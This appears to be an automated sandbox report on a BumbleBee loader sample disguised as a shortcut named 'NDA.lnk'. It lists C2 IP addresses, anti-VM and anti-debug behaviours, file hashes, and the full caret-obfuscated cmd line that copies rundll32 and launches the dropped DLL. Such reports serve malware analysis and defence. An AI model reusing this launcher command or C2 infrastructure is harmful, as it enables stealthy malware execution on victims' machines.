Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • submitted
    29-11-2024 13:02

General

  • Target

    NDA.lnk

Malware Config

Extracted

Family

bumblebee

Botnet

0310

C2

146.59.117.200:443

192.255.188.11:443

149.3.170.62:443

rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a loader malware written in C++.

  • Bumblebee family
  • Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\NDA.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b /min xco^py /y C:\Windows\System32\rund*.exe c:\programdata && start /b /min xco^py /h /y cr^eat^or.dll c:\programdata && cd c:\programdata && timeout 1 && start /b /min r^u^ndll32.exe creator.dll,runprog && exit
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\system32\xcopy.exe
        xcopy /y C:\Windows\System32\rund*.exe c:\programdata
        3⤵
          PID:2884
        • C:\Windows\system32\xcopy.exe
          xcopy /h /y creator.dll c:\programdata
          3⤵
            PID:2888
          • C:\Windows\system32\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:2908
          • \??\c:\ProgramData\rundll32.exe
            rundll32.exe creator.dll,runprog
            3⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Looks for VirtualBox Guest Additions in registry
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Suspicious behavior: EnumeratesProcesses
            PID:2940

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • \??\c:\ProgramData\creator.dll

        Filesize

        2.8MB

        MD5

        f7e264d654ad023794222f1e2fa866e6

        SHA1

        0f5a405879ce713986b4940a51158bd2ee99e750

        SHA256

        177a9689065b14408eb7af71432ec9a621d56fba5182cd74f3690e989a95d023

        SHA512

        82bd12740934ff7608419770fd205f0ddd57bd418ecee827834866414cda9265e9600ad7931097942838df4dddcc751c0e31b1e5736c4e3f52e054c5e7bf2f6b

      • \ProgramData\rundll32.exe

        Filesize

        44KB

        MD5

        dd81d91ff3b0763c392422865c9ac12e

        SHA1

        963b55acc8c566876364716d5aafa353995812a8

        SHA256

        f5691b8f200e3196e6808e932630e862f8f26f31cd949981373f23c9d87db8b9

        SHA512

        8a5036ccab9c9e71deb4ecb9598528ca19c2d697a836846d23e1547b24172fa236a798092c7db676929abff830e40f52ce8f3b3bdd8d4c2553d7c021fceaf120

      • memory/2940-53-0x00000000771D0000-0x0000000077379000-memory.dmp

        Filesize

        1.7MB

      • memory/2940-52-0x0000000002080000-0x00000000021D3000-memory.dmp

        Filesize

        1.3MB

      • memory/2940-51-0x0000000077221000-0x0000000077222000-memory.dmp

        Filesize

        4KB

      • memory/2940-55-0x00000000771D0000-0x0000000077379000-memory.dmp

        Filesize

        1.7MB

      • memory/2940-56-0x00000000771D0000-0x0000000077379000-memory.dmp

        Filesize

        1.7MB

      • memory/2940-54-0x00000000771D0000-0x0000000077379000-memory.dmp

        Filesize

        1.7MB

      • memory/2940-57-0x00000000771D0000-0x0000000077379000-memory.dmp

        Filesize

        1.7MB